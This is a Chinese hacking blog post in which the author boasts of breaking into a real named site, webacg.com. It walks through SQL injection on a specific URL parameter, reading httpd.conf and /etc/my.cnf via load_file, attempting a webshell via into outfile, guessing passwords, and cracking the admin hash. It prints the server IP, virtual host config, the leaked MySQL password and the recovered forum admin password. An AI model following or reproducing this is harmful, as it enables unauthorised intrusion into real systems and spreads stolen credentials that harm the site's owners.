r3turN’s Blog
话说此站我搞了好几天都搞不下来,让记忆帮想办法,记忆也没什么好方法。最终今天改下思路,搞定!过程如下:
找到一个点
http://www.webacg.com/job/zixun_content.php?id=71and 1=1 and 1=2判断可注.
url字母大写返回出错,Linux.
order by 判断字段数为10
union select 联合查询得到 3 5 8可查变量
分别user() database() version()得到
user:root
版本:5.0.22-Community
数据库:sino_job
既然是root,我们load_file来读他文件:
/usr/local/apache2/conf/httpd.conf
得到网站安装路径信息如下:
NameVirtualHost 60.217.32.159:80
<VirtualHost 60.217.32.159:80>
ServerName *.webacg.com
DocumentRoot /var/www/html
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{REQUEST_URI} ^/
RewriteRule /(.*)
http://www.webacg.com/$1 [R=permanent,L]
</IfModule>
</VirtualHost>
<VirtualHost 60.217.32.159:80>
ServerName
www.sinoacg.comServerAlias sinoacg.com
DocumentRoot /var/www/html/2
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteRule ^(.*)/archiver/((fid|tid)-[\w\-]+\.html)$ $1/archiver/index.php?$2
RewriteRule ^(.*)/forum-([0-9]+)-([0-9]+)\.html$ $1/forumdisplay.php?fid=$2&page=$3
RewriteRule ^(.*)/thread-([0-9]+)-([0-9]+)-([0-9]+)\.html$ $1/viewthread.php?tid=$2&extra=page\%3D$4&page=$3
RewriteRule ^(.*)/space-(username|uid)-(.+)\.html$ $1/space.php?$2=$3
RewriteRule ^(.*)/tag-(.+)\.html$ $1/tag.php?name=$2
</IfModule>
</VirtualHost>
<VirtualHost 60.217.32.159:80>
ServerName
www.webacg.comServerAlias webacg.com
DocumentRoot /var/www/html/1
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteRule ^(.*)/archiver/((fid|tid)-[\w\-]+\.html)$ $1/archiver/index.php?$2
RewriteRule ^(.*)/forum-([0-9]+)-([0-9]+)\.html$ $1/forumdisplay.php?fid=$2&page=$3
RewriteRule ^(.*)/thread-([0-9]+)-([0-9]+)-([0-9]+)\.html$ $1/viewthread.php?tid=$2&extra=page\%3D$4&page=$3
RewriteRule ^(.*)/space-(username|uid)-(.+)\.html$ $1/space.php?$2=$3
RewriteRule ^(.*)/tag-(.+)\.html$ $1/tag.php?name=$2
# RewriteCond %{REQUEST_URI} ^/
# RewriteRule /magzine/(.*)
http://d.webacg.com/magzine/$1 [R=permanent,L]
</IfModule>
</VirtualHost>
<VirtualHost 60.217.32.159:80>
ServerName
www.webacg.netServerAlias webacg.net
DocumentRoot /var/www/html/3
</VirtualHost>
<VirtualHost 60.217.32.159:80>
ServerName webacg.shengtianle.com
DocumentRoot /var/www/html/gcbdell
</VirtualHost>
<VirtualHost 60.217.32.159:80>
ServerName
www.dad1.cnServerAlias
www.dad1.com.cn dad1.cn dad1.com.cn
www.dadiw.com.cn dadiw.com.cn
DocumentRoot /var/www/html/gaosu/
</VirtualHost>
再load_file一次读MYSQL的配置文件:
/etc/my.cnf
得到MYsql密码:gcbdell#8367396@!~846462
到了这里,没什么说的,登陆phpmyadmin提全是吧?但是问题出现了,登陆phpmyadmin提示页面不存在.用牛族的supermysql连接也连接失败,诧异ing…或许是只允许本地连接,OK,想其他办法.
很显然,下一个想法就是更直接的 into outfile到出webshell了,但是问题又出现了(我怎么总出问题),一句话写不进去,这是为什么呢?或许是权限问题吧,换了几个目录,依然如此,晕,想其他办法.
这样不行,咱们就来最原始的方法,我爆你管理员帐户密码,我登陆后台想办法行吧?但是问题又出现了,这个不用说大家也能想到,我找不到密码跟后台- -!
到了此处,陷入痛苦的思考中…
仔细看了下,我刚才的那个点是一个叫做job的栏目,那么看下主站,嗯?有个论坛,思路来了!访问论坛看下论坛管理员ID:sinokl 看到这个用户名是不是有点眼熟?没错,我们之前查询出来的当前数据库叫做sino_job,这么说的话,管理员很喜欢sino 或者是sinokl这个用户名了,之前我们得到的MYsql的密码是gcbdell#8367396@!~846462看到这个密码我第一感觉就是他这个密码是拼出来的!很显然gcbdell是一个,8367396是一个846462是一个(或许数字是Q号之类的),那么我们可以尝试把这几段字符分别尝试或者拼接之后进行尝试登陆他的论坛,看了下貌似DZ的论坛,登陆进去提权不是什么难事.但是问题又出现了- -!首先,论坛有个安全机制就是密码尝试出错5次,就要等15分钟后继续尝试,我的天,尝试了N多组合都不行:
gcbdell#8367396@!~846462
gcbdell
8367396
846462
gcbdell#8367396
gcbdell#846462
gcbdell8367396
gcbdell846462
@!~846462
@!~8367396
#8367396
sinokl
sinokl846462
sinokl8367396
gcbdellsinokl
sinoklgcbdell
怎么办?怎么办?
今天闲来无事,想继续搞搞看看,那么咱们就相信一下工具把,拿出穿山甲试了下,速度慢到死,最后也同样是无法得到密码…转了转,突然想起来,狼族不是出了一个专门的工具么?叫wsi来着貌似,上网找了下最新版本,貌似是奥运版- -!拿来试试吧,得到如下数据库
这么一看,整个网站结构应该很清楚了,看到其中一个名为sinogcbbt,为什么叫bbt呢?或许是故意写错的吧.OK,继续,最终得到管理员如下信息.
看到这串MD5,说实话,我有点迷糊,这种大站的话密码应该是比较复杂的,MD5一般是查不出来的,自己跑不现实,何况彩虹表那么大,等下来我也老了.一边想其他思路,一边去试试看吧,没想到我人品这么好,竟然查到管理员密码:jiao846462#@!
hoho~~~果然不出我所料,是拼起来的,不过前面多了个jiao,这让我到哪蒙去啊,真是…
下面的就不用多说了,登陆DZ论坛后台,提权拿shell提权…
